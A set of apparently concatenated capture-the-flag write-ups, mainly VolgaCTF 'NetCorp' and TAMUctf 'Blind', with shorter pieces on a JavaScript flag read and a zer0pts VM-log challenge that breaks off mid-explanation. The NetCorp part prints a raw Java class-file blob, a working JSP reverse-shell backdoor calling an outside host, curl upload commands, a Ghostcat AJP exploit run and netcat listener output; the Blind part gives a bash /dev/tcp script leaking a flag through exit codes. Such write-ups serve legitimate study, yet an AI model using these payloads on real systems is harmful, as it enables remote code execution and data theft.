\x04\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\n\x00\x02\x00\x00\x00 \x00\x08\x00!\x00\x15\x00\x00\x00\x0c\x00\x01\x00\x00\x00\t\x00\x16\x00\x17\x00\x00\x00\x04\x00\x1f\x00 \x00\x02\x00\x13\x00\x00\x00?\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\x06\x00\x01\x00\x00\x00\'\x00\x15\x00\x00\x00 \x00\x03\x00\x00\x00\x01\x00\x16\x00\x17\x00\x00\x00\x00\x00\x01\x00!\x00"\x00\x01\x00\x00\x00\x01\x00#\x00$\x00\x02\x00\x1c\x00\x00\x00\x06\x00\x02\x00\x1d\x00%\x00\x04\x00&\x00 \x00\x02\x00\x13\x00\x00\x00?\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\x06\x00\x01\x00\x00\x00,\x00\x15\x00\x00\x00 \x00\x03\x00\x00\x00\x01\x00\x16\x00\x17\x00\x00\x00\x00\x00\x01\x00!\x00"\x00\x01\x00\x00\x00\x01\x00#\x00$\x00\x02\x00\x1c\x00\x00\x00\x06\x00\x02\x00\x1d\x00%\x00\x02\x00\'\x00\x00\x00\x02\x00(\x00)\x00\x00\x00\x06\x00\x01\x00*\x00\x00'```
I used the following [Python script](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/VolgaCTF%20Qualifier%202020/NetCorp/create_class_files.py) to recover the files, but the tool has a parameter to save read file.
```pythondef create_class_file(filename, content): class_file = open(filename + ".class", "wb") class_file.write(content)
create_class_file("ServeScreenshotServlet", b'\xca\xfe\xba\xbe\x00\x00\x004\x01\x1f\n\x00D\x00\x8e\t\x00\x8f\x00\x90\x08\x00\x91\n\x00\x92\x00\x93\x08\x00\x94\x08\x00\x95\x0b\x00\x96\x00\x97\x08\x00\x98\x0b\x00\x99\x00\x9a\x07\x00\x9b\n\x00\n\x00\x8e\n\x00\n\x00\x9c\x07\x00\x9d\x08\x00\x9e\n\x00\n\x00\x9f\x07\x00\xa0\n\x00\x10\x00\xa1\n\x00\x10\x00\xa2\n\x00\x10\x00\xa3\x08\x00\xa4\x0b\x00\x96\x00\xa5\x08\x00\xa6\n\x00\xa7\x00\xa8\x0b\x00\x96\x00\xa9\x0b\x00\xaa\x00\xab\x0b\x00\xac\x00\xad\x0b\x00\xac\x00\xae\x07\x00\xaf\n\x00\r\x00\xb0\n\x00\x10\x00\xb1\n\x00\r\x00\xb2\t\x00\x10\x00\xb3\x08\x00\xb4\x0b\x00\x1c\x00\xb5\x0b\x00\xb6\x00\xb7\x08\x00\xb8\x0b\x00\xb6\x00\xb9\x08\x00\xba\x0b\x00\xb6\x00\xbb\x08\x00\xbc\x07\x00\xbd\n\x00\xa7\x00\xbe\n\x00\xbf\x00\xc0\n\x00\xbf\x00\xc1\x08\x00\xc2\n\x00\xc3\x00\xc4\n\x00\xa7\x00\xc5\n\x00\xc3\x00\xc6\n\x00\xc3\x00\xc7\x07\x00\xc8\n\x002\x00\xc9\n\x002\x00\xca\n\x00\n\x00\xcb\n\x00\xa7\x00\xcc\x08\x00\xcd\x07\x00\xce\n\x008\x00\xcf\x08\x00\xd0\x0b\x00\x1c\x00\xd1\x08\x00\xd2\n\x00\xa7\x00\xd3\n\x00\xa7\x00\xd4\x08\x00\xd5\n\x00\xa7\x00\xd6\x08\x00\xd7\n\x00\xa7\x00\xd8\n\x00\xa7\x00\xd9\x07\x00\xda\x01\x00\x08SAVE_DIR\x01\x00\x12Ljava/lang/String;\x01\x00\rConstantValue\x01\x00\x06<init>\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x12LocalVariableTable\x01\x00\x04this\x01\x00,Lru/volgactf/netcorp/ServeScreenshotServlet;\x01\x00\x04init\x01\x00 (Ljavax/servlet/ServletConfig;)V\x01\x00\x06config\x01\x00\x1dLjavax/servlet/ServletConfig;\x01\x00\nExceptions\x07\x00\xdb\x01\x00\x07destroy\x01\x00\x06doPost\x01\x00R(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;)V\x01\x00\x08fileName\x01\x00\x0ehashedFileName\x01\x00\x04path\x01\x00\x04part\x01\x00\x19Ljavax/servlet/http/Part;\x01\x00\x07request\x01\x00\'Ljavax/servlet/http/HttpServletRequest;\x01\x00\x08response\x01\x00(Ljavax/servlet/http/HttpServletResponse;\x01\x00\x07appPath\x01\x00\x08savePath\x01\x00\x0bfileSaveDir\x01\x00\x0eLjava/io/File;\x01\x00\x06submut\x01\x00\x03out\x01\x00\x15Ljava/io/PrintWriter;\x01\x00\rStackMapTable\x07\x00\xdc\x07\x00\xa0\x07\x00\xdd\x07\x00\x9d\x07\x00\xde\x07\x00\xdf\x07\x00\xaf\x07\x00\xe0\x01\x00\x10generateFileName\x01\x00&(Ljava/lang/String;)Ljava/lang/String;\x01\x00\x01i\x01\x00\x01I\x01\x00\x05count\x01\x00\x02md\x01\x00\x1dLjava/security/MessageDigest;\x01\x00\x06digest\x01\x00\x02[B\x01\x00\x02s2\x01\x00\x02sb\x01\x00\x19Ljava/lang/StringBuilder;\x01\x00\x01e\x01\x00(Ljava/security/NoSuchAlgorithmException;\x07\x00\xe1\x07\x00y\x07\x00\x9b\x07\x00\xce\x01\x00\x0fextractFileName\x01\x00-(Ljavax/servlet/http/Part;)Ljava/lang/String;\x01\x00\x01s\x01\x00\x0bcontentDisp\x01\x00\x05items\x01\x00\x13[Ljava/lang/String;\x07\x00\x88\x01\x00\nSourceFile\x01\x00\x1bServeScreenshotServlet.java\x01\x00\x19RuntimeVisibleAnnotations\x01\x00*Ljavax/servlet/annotation/MultipartConfig;\x0c\x00H\x00I\x07\x00\xe2\x0c\x00f\x00\xe3\x01\x00*ServeScreenshotServlet Constructor called!\x07\x00\xe4\x0c\x00\xe5\x00\xe6\x01\x00+ServeScreenshotServlet "Init" method called\x01\x00.ServeScreenshotServlet "Destroy" method called\x07\x00\xde\x0c\x00\xe7\x00\xe8\x01\x00\x00\x07\x00\xe9\x0c\x00\xea\x00r\x01\x00\x17java/lang/StringBuilder\x0c\x00\xeb\x00\xec\x01\x00*ru/volgactf/netcorp/ServeScreenshotServlet\x01\x00\x07uploads\x0c\x00\xed\x00\xee\x01\x00\x0cjava/io/File\x0c\x00H\x00\xe6\x0c\x00\xef\x00\xf0\x0c\x00\xf1\x00\xf0\x01\x00\x06submit\x0c\x00\xf2\x00r\x01\x00\x04true\x07\x00\xdc\x0c\x00\xf3\x00\xf4\x0c\x00\xf5\x00\xf6\x07\x00\xf7\x0c\x00\xf8\x00\xf9\x07\x00\xdd\x0c\x00\xfa\x00\xf0\x0c\x00\xfb\x00\xfc\x01\x00\x17javax/servlet/http/Part\x0c\x00\x83\x00\x84\x0c\x00\xfd\x00\xee\x0c\x00q\x00r\x0c\x00\xfe\x00F\x01\x00\x05Error\x0c\x00\xff\x00\xe6\x07\x00\xdf\x0c\x01\x00\x01\x01\x01\x00\x10application/json\x0c\x01\x02\x00\xe6\x01\x00\x05UTF-8\x0c\x01\x03\x00\xe6\x01\x00\x10{\'success\':\'%s\'}\x01\x00\x10java/lang/Object\x0c\x01\x04\x01\x05\x07\x01\x06\x0c\x01\x07\x00\xe6\x0c\x01\x08\x00I\x01\x00\x03MD5\x07\x00\xe1\x0c\x01\t\x01\n\x0c\x01\x0b\x01\x0c\x0c\x01\r\x01\x0e\x0c\x00x\x01\x0c\x01\x00\x14java/math/BigInteger\x0c\x00H\x01\x0f\x0c\x00\xed\x01\x10\x0c\x00H\x01\x11\x0c\x01\x12\x01\x13\x01\x00\x010\x01\x00&java/security/NoSuchAlgorithmException\x0c\x01\x14\x00I\x01\x00\x13content-disposition\x0c\x01\x15\x00r\x01\x00\x01;\x0c\x01\x16\x01\x17\x0c\x01\x18\x00\xee\x01\x00\x08filename\x0c\x01\x19\x01\x1a\x01\x00\x01=\x0c\x01\x1b\x01\x1c\x0c\x01\x1d\x01\x1e\x01\x00\x1ejavax/servlet/http/HttpServlet\x01\x00\x1ejavax/servlet/ServletException\x01\x00\x10java/lang/String\x01\x00\x12java/util/Iterator\x01\x00%javax/servlet/http/HttpServletRequest\x01\x00&javax/servlet/http/HttpServletResponse\x01\x00\x13java/io/IOException\x01\x00\x1bjava/security/MessageDigest\x01\x00\x10java/lang/System\x01\x00\x15Ljava/io/PrintStream;\x01\x00\x13java/io/PrintStream\x01\x00\x07println\x01\x00\x15(Ljava/lang/String;)V\x01\x00\x11getServletContext\x01\x00 ()Ljavax/servlet/ServletContext;\x01\x00\x1cjavax/servlet/ServletContext\x01\x00\x0bgetRealPath\x01\x00\x06append\x01\x00-(Ljava/lang/String;)Ljava/lang/StringBuilder;\x01\x00\x08toString\x01\x00\x14()Ljava/lang/String;\x01\x00\x06exists\x01\x00\x03()Z\x01\x00\x05mkdir\x01\x00\x0cgetParameter\x01\x00\x06equals\x01\x00\x15(Ljava/lang/Object;)Z\x01\x00\x08getParts\x01\x00\x18()Ljava/util/Collection;\x01\x00\x14java/util/Collection\x01\x00\x08iterator\x01\x00\x16()Ljava/util/Iterator;\x01\x00\x07hasNext\x01\x00\x04next\x01\x00\x14()Ljava/lang/Object;\x01\x00\x07getName\x01\x00\tseparator\x01\x00\x05write\x01\x00\tgetWriter\x01\x00\x17()Ljava/io/PrintWriter;\x01\x00\x0esetContentType\x01\x00\x14setCharacterEncoding\x01\x00\x06format\x01\x009(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;\x01\x00\x13java/io/PrintWriter\x01\x00\x05print\x01\x00\x05flush\x01\x00\x0bgetInstance\x01\x001(Ljava/lang/String;)Ljava/security/MessageDigest;\x01\x00\x08getBytes\x01\x00\x04()[B\x01\x00\x06update\x01\x00\x05([B)V\x01\x00\x06(I[B)V\x01\x00\x15(I)Ljava/lang/String;\x01\x00\x04(I)V\x01\x00\x06length\x01\x00\x03()I\x01\x00\x0fprintStackTrace\x01\x00\tgetHeader\x01\x00\x05split\x01\x00\'(Ljava/lang/String;)[Ljava/lang/String;\x01\x00\x04trim\x01\x00\nstartsWith\x01\x00\x15(Ljava/lang/String;)Z\x01\x00\x07indexOf\x01\x00\x15(Ljava/lang/String;)I\x01\x00\tsubstring\x01\x00\x16(II)Ljava/lang/String;\x00!\x00\r\x00D\x00\x00\x00\x01\x00\x1a\x00E\x00F\x00\x01\x00G\x00\x00\x00\x02\x00\x0e\x00\x06\x00\x01\x00H\x00I\x00\x01\x00J\x00\x00\x00?\x00\x02\x00\x01\x00\x00\x00\r*\xb7\x00\x01\xb2\x00\x02\x12\x03\xb6\x00\x04\xb1\x00\x00\x00\x02\x00K\x00\x00\x00\x0e\x00\x03\x00\x00\x00\x1a\x00\x04\x00\x1b\x00\x0c\x00\x1c\x00L\x00\x00\x00\x0c\x00\x01\x00\x00\x00\r\x00M\x00N\x00\x00\x00\x01\x00O\x00P\x00\x02\x00J\x00\x00\x00A\x00\x02\x00\x02\x00\x00\x00\t\xb2\x00\x02\x12\x05\xb6\x00\x04\xb1\x00\x00\x00\x02\x00K\x00\x00\x00\n\x00\x02\x00\x00\x00\x1f\x00\x08\x00 \x00L\x00\x00\x00\x16\x00\x02\x00\x00\x00\t\x00M\x00N\x00\x00\x00\x00\x00\t\x00Q\x00R\x00\x01\x00S\x00\x00\x00\x04\x00\x01\x00T\x00\x01\x00U\x00I\x00\x01\x00J\x00\x00\x007\x00\x02\x00\x01\x00\x00\x00\t\xb2\x00\x02\x12\x06\xb6\x00\x04\xb1\x00\x00\x00\x02\x00K\x00\x00\x00\n\x00\x02\x00\x00\x00$\x00\x08\x00%\x00L\x00\x00\x00\x0c\x00\x01\x00\x00\x00\t\x00M\x00N\x00\x00\x00\x04\x00V\x00W\x00\x02\x00J\x00\x00\x02O\x00\x06\x00\x0c\x00\x00\x00\xfc+\xb9\x00\x07\x01\x00\x12\x08\xb9\x00\t\x02\x00N\xbb\x00\nY\xb7\x00\x0b-\xb6\x00\x0c\x12\x0e\xb6\x00\x0c\xb6\x00\x0f:\x04\xbb\x00\x10Y\x19\x04\xb7\x00\x11:\x05\x19\x05\xb6\x00\x12\x9a\x00\t\x19\x05\xb6\x00\x13W+\x12\x14\xb9\x00\x15\x02\x00:\x06\x19\x06\xc6\x00\r\x19\x06\x12\x16\xb6\x00\x17\x9a\x00\x03+\xb9\x00\x18\x01\x00\xb9\x00\x19\x01\x00:\x07\x19\x07\xb9\x00\x1a\x01\x00\x99\x00b\x19\x07\xb9\x00\x1b\x01\x00\xc0\x00\x1c:\x08*\x19\x08\xb7\x00\x1d:\t\xbb\x00\x10Y\x19\t\xb7\x00\x11\xb6\x00\x1e:\t*\x19\t\xb7\x00\x1f:\n\xbb\x00\nY\xb7\x00\x0b\x19\x04\xb6\x00\x0c\xb2\x00 \xb6\x00\x0c\x19\n\xb6\x00\x0c\xb6\x00\x0f:\x0b\x19\x0b\x12!\xb6\x00\x17\x99\x00\x06\xa7\xff\xa6\x19\x08\x19\x0b\xb9\x00"\x02\x00\xa7\xff\x9a,\xb9\x00#\x01\x00:\x07,\x12$\xb9\x00%\x02\x00,\x12&\xb9\x00\'\x02\x00\x19\x07\x12(\x04\xbd\x00)Y\x03\x12\x16S\xb8\x00*\xb6\x00+\x19\x07\xb6\x00,\xb1\x00\x00\x00\x03\x00K\x00\x00\x00Z\x00\x16\x00\x00\x00+\x00\x0e\x00.\x00#\x000\x00.\x001\x006\x002\x00<\x004\x00F\x005\x00U\x008\x00x\x009\x00\x80\x00;\x00\x8e\x00<\x00\x96\x00=\x00\xb2\x00>\x00\xbc\x00?\x00\xbf\x00@\x00\xc8\x00A\x00\xcb\x00C\x00\xd3\x00D\x00\xdb\x00E\x00\xe3\x00F\x00\xf6\x00G\x00\xfb\x00H\x00L\x00\x00\x00z\x00\x0c\x00\x80\x00H\x00X\x00F\x00\t\x00\x96\x002\x00Y\x00F\x00\n\x00\xb2\x00\x16\x00Z\x00F\x00\x0b\x00x\x00P\x00[\x00\\\x00\x08\x00\x00\x00\xfc\x00M\x00N\x00\x00\x00\x00\x00\xfc\x00]\x00^\x00\x01\x00\x00\x00\xfc\x00_\x00`\x00\x02\x00\x0e\x00\xee\x00a\x00F\x00\x03\x00#\x00\xd9\x00b\x00F\x00\x04\x00.\x00\xce\x00c\x00d\x00\x05\x00F\x00\xb6\x00e\x00F\x00\x06\x00\xd3\x00)\x00f\x00g\x00\x07\x00h\x00\x00\x00a\x00\x05\xfe\x00<\x07\x00i\x07\x00i\x07\x00j\xfc\x00\x18\x07\x00i\xfc\x00\x0c\x07\x00k\xff\x00\\\x00\x0c\x07\x00l\x07\x00m\x07\x00n\x07\x00i\x07\x00i\x07\x00j\x07\x00i\x07\x00k\x07\x00o\x07\x00i\x07\x00i\x07\x00i\x00\x00\xff\x00\x0b\x00\x07\x07\x00l\x07\x00m\x07\x00n\x07\x00i\x07\x00i\x07\x00j\x07\x00i\x00\x00\x00S\x00\x00\x00\x06\x00\x02\x00T\x00p\x00\x02\x00q\x00r\x00\x01\x00J\x00\x00\x01G\x00\x04\x00\x08\x00\x00\x00c\x12-\xb8\x00.M,+\xb6\x00/\xb6\x000,\xb6\x001N\xbb\x002Y\x04-\xb7\x003\x10\x10\xb6\x004:\x04\xbb\x00\nY\x10 \xb7\x005:\x05\x036\x06\x10 \x19\x04\xb6\x006d6\x07\x15\x06\x15\x07\xa2\x00\x11\x19\x05\x127\xb6\x00\x0cW\x84\x06\x01\xa7\xff\xee\x19\x05\x19\x04\xb6\x00\x0c\xb6\x00\x0f\xb0M,\xb6\x009\x12!\xb0\x00\x01\x00\x00\x00Z\x00[\x008\x00\x03\x00K\x00\x00\x002\x00\x0c\x00\x00\x00L\x00\x06\x00M\x00\x0e\x00N\x00\x13\x00O\x00#\x00P\x00.\x00R\x00B\x00S\x00J\x00R\x00P\x00V\x00[\x00X\x00\\\x00Y\x00`\x00Z\x00L\x00\x00\x00\\\x00\t\x001\x00\x1f\x00s\x00t\x00\x06\x00;\x00\x15\x00u\x00t\x00\x07\x00\x06\x00U\x00v\x00w\x00\x02\x00\x13\x00H\x00x\x00y\x00\x03\x00#\x008\x00z\x00F\x00\x04\x00.\x00-\x00{\x00|\x00\x05\x00\\\x00\x07\x00}\x00~\x00\x02\x00\x00\x00c\x00M\x00N\x00\x00\x00\x00\x00c\x00X\x00F\x00\x01\x00h\x00\x00\x000\x00\x03\xff\x00;\x00\x08\x07\x00l\x07\x00i\x07\x00\x7f\x07\x00\x80\x07\x00i\x07\x00\x81\x01\x01\x00\x00\xf9\x00\x14\xff\x00\n\x00\x02\x07\x00l\x07\x00i\x00\x01\x07\x00\x82\x00\x02\x00\x83\x00\x84\x00\x01\x00J\x00\x00\x00\xe3\x00\x04\x00\x08\x00\x00\x00U+\x12:\xb9\x00;\x02\x00M,\x12<\xb6\x00=N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x003\x19\x04\x15\x062:\x07\x19\x07\xb6\x00>\x12?\xb6\x00@\x99\x00\x19\x19\x07\x19\x07\x12A\xb6\x00B\x05`\x19\x07\xb6\x006\x04d\xb6\x00C\xb0\x84\x06\x01\xa7\xff\xcc\x12\x08\xb0\x00\x00\x00\x03\x00K\x00\x00\x00\x1e\x00\x07\x00\x00\x00_\x00\t\x00`\x00\x10\x00a\x00)\x00b\x006\x00c\x00L\x00a\x00R\x00f\x00L\x00\x00\x004\x00\x05\x00)\x00#\x00\x85\x00F\x00\x07\x00\x00\x00U\x00M\x00N\x00\x00\x00\x00\x00U\x00[\x00\\\x00\x01\x00\t\x00L\x00\x86\x00F\x00\x02\x00\x10\x00E\x00\x87\x00\x88\x00\x03\x00h\x00\x00\x00\x1e\x00\x03\xff\x00\x1b\x00\x07\x07\x00l\x07\x00o\x07\x00i\x07\x00\x89\x07\x00\x89\x01\x01\x00\x000\xf8\x00\x05\x00\x02\x00\x8a\x00\x00\x00\x02\x00\x8b\x00\x8c\x00\x00\x00\x06\x00\x01\x00\x8d\x00\x00')
create_class_file("ServeComplaintServlet", b'\xca\xfe\xba\xbe\x00\x00\x004\x00>\n\x00\x08\x00+\t\x00,\x00-\x08\x00.\n\x00/\x000\x08\x001\x08\x002\x07\x003\x07\x004\x01\x00\x10serialVersionUID\x01\x00\x01J\x01\x00\rConstantValue\x05\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\x08SAVE_DIR\x01\x00\x12Ljava/lang/String;\x08\x005\x01\x00\x06<init>\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x12LocalVariableTable\x01\x00\x04this\x01\x00+Lru/volgactf/netcorp/ServeComplaintServlet;\x01\x00\x04init\x01\x00 (Ljavax/servlet/ServletConfig;)V\x01\x00\x06config\x01\x00\x1dLjavax/servlet/ServletConfig;\x01\x00\nExceptions\x07\x006\x01\x00\x07destroy\x01\x00\x05doGet\x01\x00R(Ljavax/servlet/http/HttpServletRequest;Ljavax/servlet/http/HttpServletResponse;)V\x01\x00\x07request\x01\x00\'Ljavax/servlet/http/HttpServletRequest;\x01\x00\x08response\x01\x00(Ljavax/servlet/http/HttpServletResponse;\x07\x007\x01\x00\x06doPost\x01\x00\nSourceFile\x01\x00\x1aServeComplaintServlet.java\x01\x00\x19RuntimeVisibleAnnotations\x01\x00*Ljavax/servlet/annotation/MultipartConfig;\x0c\x00\x11\x00\x12\x07\x008\x0c\x009\x00:\x01\x00*ServeScreenshotServlet Constructor called!\x07\x00;\x0c\x00<\x00=\x01\x00+ServeScreenshotServlet "Init" method called\x01\x00.ServeScreenshotServlet "Destroy" method called\x01\x00)ru/volgactf/netcorp/ServeComplaintServlet\x01\x00\x1ejavax/servlet/http/HttpServlet\x01\x00\x07uploads\x01\x00\x1ejavax/servlet/ServletException\x01\x00\x13java/io/IOException\x01\x00\x10java/lang/System\x01\x00\x03out\x01\x00\x15Ljava/io/PrintStream;\x01\x00\x13java/io/PrintStream\x01\x00\x07println\x01\x00\x15(Ljava/lang/String;)V\x00!\x00\x07\x00\x08\x00\x00\x00\x02\x00\x1a\x00\t\x00\n\x00\x01\x00\x0b\x00\x00\x00\x02\x00\x0c\x00\x1a\x00\x0e\x00\x0f\x00\x01\x00\x0b\x00\x00\x00\x02\x00\x10\x00\x05\x00\x01\x00\x11\x00\x12\x00\x01\x00\x13\x00\x00\x00?\x00\x02\x00\x01\x00\x00\x00\r*\xb7\x00\x01\xb2\x00\x02\x12\x03\xb6\x00\x04\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\x0e\x00\x03\x00\x00\x00\x15\x00\x04\x00\x16\x00\x0c\x00\x17\x00\x15\x00\x00\x00\x0c\x00\x01\x00\x00\x00\r\x00\x16\x00\x17\x00\x00\x00\x01\x00\x18\x00\x19\x00\x02\x00\x13\x00\x00\x00A\x00\x02\x00\x02\x00\x00\x00\t\xb2\x00\x02\x12\x05\xb6\x00\x04\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\n\x00\x02\x00\x00\x00\x1b\x00\x08\x00\x1c\x00\x15\x00\x00\x00\x16\x00\x02\x00\x00\x00\t\x00\x16\x00\x17\x00\x00\x00\x00\x00\t\x00\x1a\x00\x1b\x00\x01\x00\x1c\x00\x00\x00\x04\x00\x01\x00\x1d\x00\x01\x00\x1e\x00\x12\x00\x01\x00\x13\x00\x00\x007\x00\x02\x00\x01\x00\x00\x00\t\xb2\x00\x02\x12\x06\xb6\x00\x04\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\n\x00\x02\x00\x00\x00 \x00\x08\x00!\x00\x15\x00\x00\x00\x0c\x00\x01\x00\x00\x00\t\x00\x16\x00\x17\x00\x00\x00\x04\x00\x1f\x00 \x00\x02\x00\x13\x00\x00\x00?\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\x06\x00\x01\x00\x00\x00\'\x00\x15\x00\x00\x00 \x00\x03\x00\x00\x00\x01\x00\x16\x00\x17\x00\x00\x00\x00\x00\x01\x00!\x00"\x00\x01\x00\x00\x00\x01\x00#\x00$\x00\x02\x00\x1c\x00\x00\x00\x06\x00\x02\x00\x1d\x00%\x00\x04\x00&\x00 \x00\x02\x00\x13\x00\x00\x00?\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x14\x00\x00\x00\x06\x00\x01\x00\x00\x00,\x00\x15\x00\x00\x00 \x00\x03\x00\x00\x00\x01\x00\x16\x00\x17\x00\x00\x00\x00\x00\x01\x00!\x00"\x00\x01\x00\x00\x00\x01\x00#\x00$\x00\x02\x00\x1c\x00\x00\x00\x06\x00\x02\x00\x1d\x00%\x00\x02\x00\'\x00\x00\x00\x02\x00(\x00)\x00\x00\x00\x06\x00\x01\x00*\x00\x00')```
Now files can be decompiled to analyze them:* [`ServeScreenshotServlet.class`](https://github.com/m3ssap0/CTF-Writeups/raw/master/VolgaCTF%20Qualifier%202020/NetCorp/ServeScreenshotServlet.class);* [`ServeComplaintServlet.class`](https://github.com/m3ssap0/CTF-Writeups/raw/master/VolgaCTF%20Qualifier%202020/NetCorp/ServeComplaintServlet.class).
The interesting one is `ServeScreenshotServlet.class`.
```java protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String appPath = request.getServletContext().getRealPath("");
String savePath = appPath + "uploads"; File fileSaveDir = new File(savePath); if (!fileSaveDir.exists()) { fileSaveDir.mkdir(); } String submut = request.getParameter("submit"); if (submut == null || !submut.equals("true"));
for (Part part : request.getParts()) { String fileName = extractFileName(part); fileName = (new File(fileName)).getName(); String hashedFileName = generateFileName(fileName); String path = savePath + File.separator + hashedFileName; if (path.equals("Error")) continue; part.write(path); } PrintWriter out = response.getWriter(); response.setContentType("application/json"); response.setCharacterEncoding("UTF-8"); out.print(String.format("{'success':'%s'}", new Object[] { "true" })); out.flush(); } private String generateFileName(String fileName) { try { MessageDigest md = MessageDigest.getInstance("MD5"); md.update(fileName.getBytes()); byte[] digest = md.digest(); String s2 = (new BigInteger(true, digest)).toString(16); StringBuilder sb = new StringBuilder(32); for (int i = 0, count = 32 - s2.length(); i < count; i++) { sb.append("0"); } return sb.append(s2).toString(); } catch (NoSuchAlgorithmException e) { e.printStackTrace(); return "Error"; } }```
The `ServeScreenshotServlet` contains a file upload functionality via HTTP POST request. The file is stored under `/uploads/` subdirectory with an hashed `fileName`.
You can use a pure Java [backdoor.jsp](https://github.com/m3ssap0/CTF-Writeups/raw/master/VolgaCTF%20Qualifier%202020/NetCorp/backdoor.jsp) file to execute commands on the remote host.
```jsp<%java.lang.String host="x.x.x.x";int port=1337;java.lang.String[] cmd={"commands", "here"};java.lang.Process p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();java.net.Socket s=new java.net.Socket(host,port);java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50L);try {p.exitValue();break;}catch (java.lang.Exception e){}};p.destroy();s.close();%>```
The file can be uploaded with the following. command.
```root@m3ss4p0:~# curl -F '[email protected]' -X POST http://netcorp.q.2020.volgactf.ru:7782/ServeScreenshot{'success':'true'}```
The name of the page will be the MD5 hash of the original name.
```root@m3ss4p0:~# curl -X GET http://netcorp.q.2020.volgactf.ru:7782/uploads/76fd18e7cd6f88d7ae8591ed08ea6fbb<%java.lang.String host="x.x.x.x";int port=1337;java.lang.String[] cmd={"commands", "here"};java.lang.Process p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();java.net.Socket s=new java.net.Socket(host,port);java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50L);try {p.exitValue();break;}catch (java.lang.Exception e){}};p.destroy();s.close();%>```
A listening server can be set up with `nc -lvkp 1337`.
The execution can be triggered with the exploit.
```root@m3ss4p0:~/Ghostcat-CNVD-2020-10487# python3 ajpShooter.py http://netcorp.q.2020.volgactf.ru:7782 8009 /uploads/76fd18e7cd6f88d7ae8591ed08ea6fbb eval
_ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test
[<] 200 200[<] Set-Cookie: JSESSIONID=969DC9D72D7FBE51D6A6909922B94662; Path=/; HttpOnly[<] Content-Type: text/html;charset=ISO-8859-1[<] Content-Length: 1```
Launching the attack with `java.lang.String[] cmd={"ls"};` into the backdoor file will give you the following.
```user@listening-server:~$ nc -lvkp 1337Listening on [0.0.0.0] (family 0, port 1337)Connection from bahilovopt.ru 49794 received!BUILDING.txtCONTRIBUTING.mdLICENSENOTICEREADME.mdRELEASE-NOTESRUNNING.txtbinconfflag.txtliblogstempwebappswork```
Launching the attack with `java.lang.String[] cmd={"cat", "flag.txt"};` into the backdoor file will give you the flag.
```user@listening-server:~$ nc -lvkp 1337Listening on [0.0.0.0] (family 0, port 1337)Connection from bahilovopt.ru 41004 received!VolgaCTF{qualification_unites_and_real_awesome_nothing_though_i_need_else}``` |
# TAMUctf_BlindWrite up of the challenge Blind from TAMUctf## ReconI connected to `nc challenges.tamuctf.com 3424`
I got back the prompt `Execute:`
When Typing a command a number is returned. I figured out that this must be the Linux/ UNIX exit codes.
After playing around for a bit I found out that typing `cat flag.txt` returns 0, meaning the operation was successful and a flag.txt file exists in the current directory.
## SolutionMy plan was to return the flag over these error codes, since you're able to send numbers up to 255 with the `exit` command.
I wrote a short Bash script to extract the flag as decimal numbers:```bash#!/usr/bin/env bash
exec 3<>/dev/tcp/challenges.tamuctf.com/3424; #Setting up a Socket
for i in {1..30}do #Convert each Byte and send exit with error code echo "exit \$(printf '%d' \"'\$(cat flag.txt|cut -c$i-$i)\")" >&3 donecat <&3```It sends this command `exit \$(printf '%d' \"'\$(cat flag.txt|cut -c$i-$i)\")` for the server to get executed.I get the flag with cat `flag.txt` pipe that to `cut -c$i-$i` because I can only extract one letter at a time.The letter gets converted to its decimal equivalent with `printf '%d' "'[Output from cat and cut]'`.
Now all that is left is to convert the flag back to ASCII and you get:`gigem{r3v3r53_5h3ll5}` |
The challenge author forgot to strip the globals; therefore, it is possible to just read out the flag:
```javascriptlet a = read('/flag');print(a);```
flag: `F#{84e3f3e8124f5753e61b7f7d543bf9bb3410645a}` |
# VM log (re, 213p, 68 solved)
In the task we get a [simple vm code](https://raw.githubusercontent.com/TFNS/writeups/master/2020-03-07-zer0ptsCTF/vmlog/vm.py) and [execution trace](https://raw.githubusercontent.com/TFNS/writeups/master/2020-03-07-zer0ptsCTF/vmlog/log.txt).
The VM looks like some brainfuck, but we didn't even try to understand it.Once we run it a couple of times it becomes clear that there is some internal loop which reads a character from stdin and then dumps memory state.
This suggests we can brute-force the flag byte by byte, by checking after which character the memory state matches the one in the trace log.We pretty much run the VM sending `a`, `b`, `c`... and check when the output match.Then we send two characters, then three etc.
We modified the vm code a bit, to it reads input from predefined array and yields the memory state, so we can easily intrument the run:
